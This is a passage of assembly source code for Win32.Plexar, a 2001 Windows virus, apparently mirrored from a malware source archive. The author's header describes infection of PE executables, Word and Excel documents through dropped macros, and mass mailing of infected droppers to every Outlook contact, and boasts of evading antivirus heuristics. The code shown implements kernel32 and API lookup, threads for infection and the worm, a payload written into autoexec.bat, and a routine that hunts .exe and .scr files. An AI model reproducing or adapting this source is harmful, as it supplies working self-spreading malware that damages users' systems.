mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-02 08:25:27 +00:00
3193 lines
74 KiB
NASM
3193 lines
74 KiB
NASM
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20>< Win32.Plexar ><3E>
|
|||
|
; Designed by LiteSys in Venezuela, South America
|
|||
|
;
|
|||
|
; PE/DOC/XLS/OUTLOOK Multithreaded Polymorphic Direct Action infector.
|
|||
|
;
|
|||
|
; Welcome to Plexar, my latest code.
|
|||
|
;
|
|||
|
; It infects PE files by incrementing the last section, I don't overwrite
|
|||
|
; .reloc section, it's preferible to let it alone. In fact, this virus
|
|||
|
; avoids infecting some AV or Win32 files that should never be infected.
|
|||
|
; This is done by CRC32 comparation.
|
|||
|
;
|
|||
|
; Infects Word and Excel documents by dropping (thru VBScript) a macro
|
|||
|
; module-infectant virus in the normal template and personal.xls that is
|
|||
|
; capable of dropping an infected PE file to the Windows directory and then
|
|||
|
; running it.
|
|||
|
;
|
|||
|
; Distributes through Electronic Mail by dropping a VBS worm capable of
|
|||
|
; sending infected droppers to every email address in the Outlook address
|
|||
|
; book. Sorry but I didn't have any time to code a decent MAPI worm =(.
|
|||
|
;
|
|||
|
; The Poly engine is another lame table-driven engine written by me =), no
|
|||
|
; anti-aver intentions were the reason to write that poly engine, just to
|
|||
|
; conceal the code a little. So I think it doesn't desire an explanation
|
|||
|
; because the garbage is very lame.
|
|||
|
;
|
|||
|
; It runs the different routines (word infection, vbs worm, direct action)
|
|||
|
; in different threads. As I always said, I don't optimize my code too much.
|
|||
|
;
|
|||
|
; The payload is very funny and if you're from Venezuela I hope you
|
|||
|
; appreciate it. Consists in dropping a simple com file that displays
|
|||
|
; some silly stuff in spanish, it runs on autoexec.bat but won't display
|
|||
|
; the message until the following rule is complied (this is a very
|
|||
|
; kewl idea I learnt from Byway ;D):
|
|||
|
;
|
|||
|
; If Month <= 7: Day = Month^2 / 3 + 4
|
|||
|
; If Month >= 8: Day = Month^2 / 5 - 4
|
|||
|
;
|
|||
|
; So the payload will run on every month (as a coincidence, the formula
|
|||
|
; pointed to December 24th :P). It's not destructive so don't blame me.
|
|||
|
;
|
|||
|
; This virus has lots of bugs, i've corrected many but still there are a
|
|||
|
; lot. It was tested under Win95 (4.10.1111), Win98 (4.10.1998), WinME and
|
|||
|
; WinNT (4.0/SP4), the virus worked perfectly under those versions. I don't
|
|||
|
; know about Win98 SE and Win2K, since I don't have them installed, I have
|
|||
|
; the CDs here but i'm a lazy ass and my HD space is totally phuken.
|
|||
|
;
|
|||
|
; Virus Size = 12kb. Code not commented. Nor even AVP or Norton (with
|
|||
|
; their "high heuristic" bloodhound shit) flagged the infected PE baits,
|
|||
|
; except from Norton, which flagged the VBS worm.
|
|||
|
;
|
|||
|
; If you need to contact me you can use both mail addresses: litesys@monte.as
|
|||
|
; or liteno2@softhome.net. Rembember, for decent stuff.
|
|||
|
;
|
|||
|
; Patria o Muerte: Venceremos.
|
|||
|
; LiteSys.
|
|||
|
; Venezuela, Julio/Agosto - (c) 2001
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
.586
|
|||
|
.MODEL FLAT, STDCALL
|
|||
|
|
|||
|
INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
|
|||
|
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC
|
|||
|
|
|||
|
EXTRN ExitProcess:PROC
|
|||
|
EXTRN MessageBoxExA:PROC
|
|||
|
|
|||
|
.DATA
|
|||
|
|
|||
|
DEBUG EQU FALSE
|
|||
|
|
|||
|
OFS EQU <OFFSET [EBP]>
|
|||
|
BY EQU <BYTE PTR [EBP]>
|
|||
|
WO EQU <WORD PTR [EBP]>
|
|||
|
DWO EQU <DWORD PTR [EBP]>
|
|||
|
RDTSC EQU <DW 310Fh>
|
|||
|
|
|||
|
APICALL MACRO APIz
|
|||
|
CALL DWORD PTR [APIz + EBP]
|
|||
|
ENDM
|
|||
|
|
|||
|
Numero_Paginas EQU 32h
|
|||
|
K32_W9X EQU 0BFF70000h
|
|||
|
GPA_W9X EQU 0BFF76DACh
|
|||
|
Virus_Tama<EFBFBD>o EQU (Termina_Plexar - Empieza_Plexar)
|
|||
|
|
|||
|
Titulo DB "Plexar."
|
|||
|
DB Virus_Tama<EFBFBD>o / 10000 MOD 10 + 30h
|
|||
|
DB Virus_Tama<EFBFBD>o / 01000 MOD 10 + 30h
|
|||
|
DB Virus_Tama<EFBFBD>o / 00100 MOD 10 + 30h
|
|||
|
DB Virus_Tama<EFBFBD>o / 00010 MOD 10 + 30h
|
|||
|
DB Virus_Tama<EFBFBD>o / 00001 MOD 10 + 30h
|
|||
|
DB 00h
|
|||
|
|
|||
|
Mensaje DB "Plexar (c) 2001 LiteSys "
|
|||
|
DB "-- Activado."
|
|||
|
DB 00h
|
|||
|
|
|||
|
REG_SZ EQU <1>
|
|||
|
HKEY_LOCAL_MACHINE EQU <80000002h>
|
|||
|
|
|||
|
.CODE
|
|||
|
|
|||
|
Empieza_Plexar:
|
|||
|
|
|||
|
CALL @Delta
|
|||
|
@Delta:
|
|||
|
POP EAX
|
|||
|
XCHG EBP, EAX
|
|||
|
SUB EBP, OFFSET @Delta
|
|||
|
|
|||
|
JMP @@1
|
|||
|
DB 00h, 00h, "[PLEXAR]", 00h, 00h
|
|||
|
@@1:
|
|||
|
|
|||
|
CALL @SEH_1
|
|||
|
|
|||
|
MOV ESP, DWORD PTR [ESP+8h]
|
|||
|
JMP @FueraHost
|
|||
|
|
|||
|
@SEH_1:
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH DWORD PTR FS:[EAX]
|
|||
|
MOV FS:[EAX], ESP
|
|||
|
|
|||
|
MOV EDI, DWORD PTR [ESP+8h]
|
|||
|
CALL Busca_K32
|
|||
|
CALL Busca_GPA
|
|||
|
|
|||
|
LEA ESI, OFS [CreateFileA]
|
|||
|
LEA EDI, OFS [APIs_K32]
|
|||
|
MOV EBX, DWO [KERNEL32]
|
|||
|
CALL Busca_APIs
|
|||
|
|
|||
|
LEA EDX, OFS [RewtDir]
|
|||
|
PUSH EDX
|
|||
|
PUSH MAX_PATH
|
|||
|
APICALL GetCurrentDirectoryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @FueraHost
|
|||
|
|
|||
|
IF DEBUG
|
|||
|
|
|||
|
PUSH EBP
|
|||
|
CALL Directa
|
|||
|
|
|||
|
PUSH EBP
|
|||
|
CALL Worm_VBS
|
|||
|
|
|||
|
PUSH EBP
|
|||
|
CALL Infecta_Word
|
|||
|
|
|||
|
JMP @FueraHost
|
|||
|
|
|||
|
ELSE
|
|||
|
|
|||
|
CALL Thread
|
|||
|
|
|||
|
ENDIF
|
|||
|
|
|||
|
CALL Er_Pailon
|
|||
|
|
|||
|
@FueraHost:
|
|||
|
|
|||
|
XOR ECX, ECX
|
|||
|
POP DWORD PTR FS:[ECX]
|
|||
|
POP ECX
|
|||
|
|
|||
|
PUSH 12345678h
|
|||
|
ORG $-4
|
|||
|
HostBack DD OFFSET Mentira
|
|||
|
RET
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; El Thread Principal, carga los otros threads.
|
|||
|
|
|||
|
Thread PROC
|
|||
|
PUSHAD
|
|||
|
|
|||
|
AND BY [Listo_Directa], 00h
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
LEA EBX, OFS [Thread_Directa]
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
PUSH EBP
|
|||
|
LEA EBX, OFS [Directa]
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateThread
|
|||
|
MOV DWO [Thread_Directa], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @FinThread
|
|||
|
|
|||
|
PUSH 02h
|
|||
|
PUSH EAX
|
|||
|
APICALL SetThreadPriority
|
|||
|
|
|||
|
@RevDirect:
|
|||
|
PUSH -1
|
|||
|
PUSH DWO [Thread_Directa]
|
|||
|
APICALL WaitForSingleObject
|
|||
|
|
|||
|
CMP BY [Listo_Directa], 01h
|
|||
|
JNZ @RevDirect
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
LEA EBX, OFS [Thread_WormVBS]
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
PUSH EBP
|
|||
|
LEA EBX, OFS [Worm_VBS]
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateThread
|
|||
|
MOV DWO [Thread_WormVBS], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @FinThread
|
|||
|
|
|||
|
PUSH 02h
|
|||
|
PUSH EAX
|
|||
|
APICALL SetThreadPriority
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
LEA EBX, OFS [Thread_IWord]
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
PUSH EBP
|
|||
|
LEA EBX, OFS [Infecta_Word]
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateThread
|
|||
|
MOV DWO [Thread_IWord], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @FinThread
|
|||
|
|
|||
|
PUSH 02h
|
|||
|
PUSH EAX
|
|||
|
APICALL SetThreadPriority
|
|||
|
|
|||
|
PUSH -1
|
|||
|
PUSH TRUE
|
|||
|
LEA EAX, OFS [Thread_WormVBS]
|
|||
|
PUSH EAX
|
|||
|
PUSH 02h
|
|||
|
APICALL WaitForMultipleObjects
|
|||
|
|
|||
|
@FinThread:
|
|||
|
|
|||
|
POPAD
|
|||
|
RET
|
|||
|
|
|||
|
Thread ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; Payload.
|
|||
|
|
|||
|
Er_Pailon PROC
|
|||
|
PUSHAD
|
|||
|
|
|||
|
CDQ
|
|||
|
PUSH EDX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH CREATE_NEW
|
|||
|
PUSH EDX
|
|||
|
PUSH EDX
|
|||
|
PUSH GENERIC_WRITE
|
|||
|
LEA EAX, OFS [CocoFrio]
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [PFHandle], EAX
|
|||
|
INC EAX
|
|||
|
JZ @P_Fin
|
|||
|
DEC EAX
|
|||
|
XCHG EBX, EAX
|
|||
|
|
|||
|
XOR EDX, EDX
|
|||
|
PUSH EDX
|
|||
|
LEA EAX, OFS [PTemporal]
|
|||
|
PUSH EAX
|
|||
|
PUSH Largo_PProg
|
|||
|
LEA EAX, OFS [Payload_Prog]
|
|||
|
PUSH EAX
|
|||
|
PUSH EBX
|
|||
|
APICALL WriteFile
|
|||
|
OR EAX, EAX
|
|||
|
JZ @P_Fin
|
|||
|
|
|||
|
PUSH DWO [PFHandle]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
CDQ
|
|||
|
PUSH EDX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH OPEN_EXISTING
|
|||
|
PUSH EDX
|
|||
|
PUSH EDX
|
|||
|
PUSH GENERIC_WRITE
|
|||
|
LEA EAX, OFS [AutoExec]
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [PFHandle], EAX
|
|||
|
INC EAX
|
|||
|
JZ @P_Fin
|
|||
|
DEC EAX
|
|||
|
|
|||
|
CDQ
|
|||
|
PUSH 00000002h
|
|||
|
PUSH EDX
|
|||
|
PUSH EDX
|
|||
|
PUSH EAX
|
|||
|
APICALL SetFilePointer
|
|||
|
|
|||
|
CDQ
|
|||
|
PUSH EDX
|
|||
|
LEA EAX, OFS [PTemporal]
|
|||
|
PUSH EAX
|
|||
|
PUSH Largo_CocoFrio-1
|
|||
|
LEA EAX, OFS [CocoFrio]
|
|||
|
PUSH EAX
|
|||
|
PUSH DWO [PFHandle]
|
|||
|
APICALL WriteFile
|
|||
|
OR EAX, EAX
|
|||
|
JZ @P_Fin
|
|||
|
|
|||
|
PUSH DWO [PFHandle]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
@P_Fin:
|
|||
|
|
|||
|
POPAD
|
|||
|
RET
|
|||
|
Er_Pailon ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; Proceso para buscar la base de KERNEL32
|
|||
|
|
|||
|
Busca_K32 PROC
|
|||
|
|
|||
|
AND EDI, 0FFFF0000h
|
|||
|
PUSH Numero_Paginas
|
|||
|
POP ECX
|
|||
|
|
|||
|
@Compara_K32:
|
|||
|
|
|||
|
PUSH EDI
|
|||
|
|
|||
|
MOV BX, WORD PTR [EDI]
|
|||
|
OR BX, 03D5Bh ; 5A4D || 3D5B == 7F5F
|
|||
|
SUB BX, 07F5Fh
|
|||
|
JNZ @Incrementa_K32
|
|||
|
|
|||
|
ADD EDI, [EDI+3Ch]
|
|||
|
MOV BX, WORD PTR [EDI] ; 4550 && C443 == 4440
|
|||
|
AND BX, 0C443h
|
|||
|
XOR BX, 04440h
|
|||
|
JE @EnK32
|
|||
|
|
|||
|
@Incrementa_K32:
|
|||
|
|
|||
|
POP EDI
|
|||
|
|
|||
|
SUB EDI, 10000h
|
|||
|
LOOP @Compara_K32
|
|||
|
|
|||
|
PUSH K32_W9X
|
|||
|
|
|||
|
@EnK32:
|
|||
|
|
|||
|
POP DWO [KERNEL32]
|
|||
|
RET
|
|||
|
|
|||
|
Busca_K32 ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
DB 5 DUP (90h)
|
|||
|
|
|||
|
; Proceso para buscar a GetProcAddress
|
|||
|
|
|||
|
Busca_GPA PROC
|
|||
|
|
|||
|
MOV EBX, DWO [KERNEL32]
|
|||
|
MOV EDI, EBX
|
|||
|
|
|||
|
ADD EDI, DWORD PTR [EDI+3Ch]
|
|||
|
MOV EDI, DWORD PTR [EDI+78h]
|
|||
|
ADD EDI, EBX
|
|||
|
MOV DWO [Exports], EDI
|
|||
|
|
|||
|
MOV ECX, DWORD PTR [EDI+18h]
|
|||
|
DEC ECX
|
|||
|
|
|||
|
MOV EDI, DWORD PTR [EDI+20h]
|
|||
|
ADD EDI, EBX
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
|
|||
|
@BGPA_1:
|
|||
|
|
|||
|
MOV ESI, DWORD PTR [EDI]
|
|||
|
ADD ESI, EBX
|
|||
|
PUSH EDI
|
|||
|
|
|||
|
PUSH l_GetProcAddress
|
|||
|
POP EDI
|
|||
|
PUSHAD
|
|||
|
CALL CRC32
|
|||
|
CMP EAX, CRC32_GetProcAddress
|
|||
|
POPAD
|
|||
|
POP EDI
|
|||
|
JE @BGPA_2
|
|||
|
|
|||
|
INC EAX
|
|||
|
ADD EDI, 4h
|
|||
|
|
|||
|
LOOP @BGPA_1
|
|||
|
|
|||
|
PUSH GPA_W9X
|
|||
|
|
|||
|
JMP @BGPA_3
|
|||
|
|
|||
|
@BGPA_2:
|
|||
|
|
|||
|
MOV ESI, DWO [Exports]
|
|||
|
ADD EAX, EAX
|
|||
|
|
|||
|
MOV EDI, DWORD PTR [ESI+24h]
|
|||
|
ADD EDI, EBX
|
|||
|
ADD EDI, EAX
|
|||
|
|
|||
|
MOVZX EAX, WORD PTR [EDI]
|
|||
|
IMUL EAX, 4h
|
|||
|
|
|||
|
MOV EDI, DWORD PTR [ESI+1Ch]
|
|||
|
ADD EDI, EBX
|
|||
|
ADD EDI, EAX
|
|||
|
|
|||
|
MOV EAX, DWORD PTR [EDI]
|
|||
|
ADD EAX, EBX
|
|||
|
|
|||
|
PUSH EAX
|
|||
|
|
|||
|
@BGPA_3:
|
|||
|
|
|||
|
POP DWO [GetProcAddress]
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
Busca_GPA ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; ESI -> Donde Guardar las APIs
|
|||
|
; EDI -> Cadenas de APIs
|
|||
|
; EBX -> Modulo
|
|||
|
|
|||
|
; Proceso para buscar las APIs
|
|||
|
|
|||
|
Busca_APIs PROC
|
|||
|
|
|||
|
PUSHAD
|
|||
|
|
|||
|
MOV DWO [Guardalo], ESI
|
|||
|
XCHG EDI, ESI
|
|||
|
|
|||
|
@BA1:
|
|||
|
LEA EDI, OFS [TempAPI]
|
|||
|
@BA2:
|
|||
|
|
|||
|
CMP BYTE PTR [ESI], 00h
|
|||
|
JE @BA4
|
|||
|
|
|||
|
LODSB
|
|||
|
CMP AL, 0Eh
|
|||
|
JA @BA3
|
|||
|
|
|||
|
XOR ECX, ECX
|
|||
|
XCHG CL, AL
|
|||
|
|
|||
|
PUSH ESI
|
|||
|
LEA ESI, OFS [PackedAPIs]
|
|||
|
|
|||
|
@BA5:
|
|||
|
INC ESI
|
|||
|
CMP BYTE PTR [ESI], 00h
|
|||
|
JNZ @BA5
|
|||
|
|
|||
|
LOOP @BA5
|
|||
|
|
|||
|
INC ESI
|
|||
|
@BA6:
|
|||
|
MOVSB
|
|||
|
CMP BYTE PTR [ESI], 00h
|
|||
|
JNZ @BA6
|
|||
|
|
|||
|
POP ESI
|
|||
|
JMP @BA2
|
|||
|
|
|||
|
@BA3:
|
|||
|
STOSB
|
|||
|
JMP @BA2
|
|||
|
|
|||
|
@BA4:
|
|||
|
|
|||
|
XOR AL, AL
|
|||
|
STOSB
|
|||
|
|
|||
|
LEA EAX, OFS [TempAPI]
|
|||
|
PUSH EAX
|
|||
|
PUSH EBX
|
|||
|
CALL [GetProcAddress+EBP]
|
|||
|
NOP
|
|||
|
|
|||
|
PUSH ESI
|
|||
|
MOV ESI, 12345678h
|
|||
|
ORG $-4
|
|||
|
Guardalo DD 00000000h
|
|||
|
MOV DWORD PTR [ESI], EAX
|
|||
|
ADD DWO [Guardalo], 00000004h
|
|||
|
POP ESI
|
|||
|
|
|||
|
INC ESI
|
|||
|
|
|||
|
CMP BYTE PTR [ESI], 0FFh
|
|||
|
JNZ @BA1
|
|||
|
|
|||
|
@OA7:
|
|||
|
|
|||
|
POPAD
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
Busca_APIs ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; Accion directa.
|
|||
|
|
|||
|
Directa PROC Pascal DeltaOfs:DWORD
|
|||
|
|
|||
|
PUSHAD
|
|||
|
|
|||
|
MOV EBP, DeltaOfs
|
|||
|
|
|||
|
CALL @SEH_2
|
|||
|
|
|||
|
MOV ESP, DWORD PTR [ESP+8h]
|
|||
|
JMP @DIRF
|
|||
|
|
|||
|
@SEH_2:
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH DWORD PTR FS:[EAX]
|
|||
|
MOV FS:[EAX], ESP
|
|||
|
|
|||
|
LEA EDX, OFS [RewtDir]
|
|||
|
PUSH EDX
|
|||
|
APICALL SetCurrentDirectoryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @DIRF
|
|||
|
|
|||
|
@DIR1:
|
|||
|
|
|||
|
LEA EAX, OFS [Busqueda]
|
|||
|
PUSH EAX
|
|||
|
LEA EAX, OFS [Mascara]
|
|||
|
PUSH EAX
|
|||
|
APICALL FindFirstFileA
|
|||
|
MOV DWO [BHandle], EAX
|
|||
|
INC EAX
|
|||
|
JZ @DIR2
|
|||
|
|
|||
|
@DIR3:
|
|||
|
|
|||
|
LEA EDI, OFS [Busqueda.wfd_szFileName]
|
|||
|
MOV EBX, EDI
|
|||
|
PUSH EBX
|
|||
|
XOR AL, AL
|
|||
|
SCASB
|
|||
|
JNZ $-1
|
|||
|
XCHG ESI, EDI
|
|||
|
SUB ESI, 5h
|
|||
|
OR DWORD PTR [ESI], 20202020h
|
|||
|
MOV EDI, 5h
|
|||
|
CALL CRC32
|
|||
|
POP EBX
|
|||
|
CMP EAX, CRC_EXE ; .exe crc32
|
|||
|
JE @Infecta_Este_Exe
|
|||
|
CMP EAX, CRC_SCR ; .scr crc32
|
|||
|
JE @Infecta_Este_Exe
|
|||
|
|
|||
|
@Retorna_Directa:
|
|||
|
|
|||
|
LEA EAX, OFS [Busqueda]
|
|||
|
PUSH EAX
|
|||
|
PUSH DWO [BHandle]
|
|||
|
APICALL FindNextFileA
|
|||
|
OR EAX, EAX
|
|||
|
JNZ @DIR3
|
|||
|
|
|||
|
PUSH DWO [BHandle]
|
|||
|
APICALL FindClose
|
|||
|
|
|||
|
@DIR2:
|
|||
|
|
|||
|
LEA EAX, OFS [Puto_Puto]
|
|||
|
PUSH EAX
|
|||
|
APICALL SetCurrentDirectoryA
|
|||
|
|
|||
|
LEA EAX, OFS [Busqueda.wfd_szFileName]
|
|||
|
PUSH EAX
|
|||
|
PUSH MAX_PATH
|
|||
|
APICALL GetCurrentDirectoryA
|
|||
|
CMP EAX, DWO [LargPP]
|
|||
|
JZ @DIRF
|
|||
|
MOV DWO [LargPP], EAX
|
|||
|
JMP @DIR1
|
|||
|
|
|||
|
LEA EAX, OFS [RewtDir]
|
|||
|
PUSH EAX
|
|||
|
APICALL SetCurrentDirectoryA
|
|||
|
|
|||
|
@DIRF:
|
|||
|
|
|||
|
XOR ECX, ECX
|
|||
|
POP DWORD PTR FS:[ECX]
|
|||
|
POP ECX
|
|||
|
|
|||
|
IF DEBUG
|
|||
|
|
|||
|
POPAD
|
|||
|
RET
|
|||
|
|
|||
|
ELSE
|
|||
|
|
|||
|
INC BY [Listo_Directa]
|
|||
|
|
|||
|
MOV DWO [GuardaEBP], EBP
|
|||
|
POPAD
|
|||
|
|
|||
|
MOV EBX, 12345678h
|
|||
